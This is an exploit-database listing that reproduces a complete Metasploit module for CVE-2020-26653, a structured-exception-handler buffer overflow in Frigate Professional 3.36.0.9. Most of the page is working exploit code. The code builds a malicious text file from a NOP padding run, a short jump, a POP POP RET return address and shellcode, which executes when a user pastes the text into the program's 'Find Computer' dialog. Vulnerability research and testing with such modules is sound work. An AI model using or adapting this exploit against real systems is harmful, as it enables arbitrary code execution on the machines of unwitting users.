Frigate Professional 3.36.0.9 'Find Computer' Buffer Overflow (Metasploit)
CVE
Category
Price
Severity
CVE-2020-26653
CWE-119
$2500
High
Author
Risk
Exploitation Type
Date
Metasploit
High
Local
2020-10-16
CPE PURL
cpe:cpe:/a:frigate:professional:3.36.0.9 pkg:https://exploitalert.com/view-details/frigate-professional-3-36-0-9-039-find-computer-039-buffer-overflow-metasploit
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100096 Below is a copy:
Frigate Professional 3.36.0.9 'Find Computer' Buffer Overflow (Metasploit) ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info={})
super(update_info(info,
'Name' => "Frigate Professional 3.36.0.9 'Find Computer' Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow in Frigate Professional 3.36.0.9.
By creating a specially designed TXT file go to "Disk"> "Find Computer" then copy the
characters located in the file (.txt) then paste it in the "Computer Name" > "OK button".
The application is vulnerable and the buffer is overwritten, allowing the shellcode to be executed.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Paras Bhatia', # Exploit-DB POC
'ZwX' # Metasploit Module
],
'References' =>
[
[ 'EDB', '48579' ],
[ 'URL', 'https://www.exploit-db.com/exploits/48579' ],
[ 'URL', 'https://cxsecurity.com/issue/WLB-2020060051' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 7 Ultimate SP1 X86 - Windows 7 F.Prenium x64', { 'Ret' => 0x40010C4B } ], # POP POP RET [rtl60.bpl]
],
'Payload' =>
{
'BadChars' => "\x00\x14\x09\x0a\x0d"
},
'Privileged' => false,
'DisclosureDate' => "Jun 04 2020",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'Create malicious file', 'name.txt'])
])
end
def exploit
file_payload = payload.encoded
msfsploit = make_fast_nops(4112)
msfsploit << "\xeb\x20#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH
msfsploit << [target.ret].pack("V*") # SEH
msfsploit << "\x90" * 50
msfsploit << file_payload
file_create(msfsploit)
end
end
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum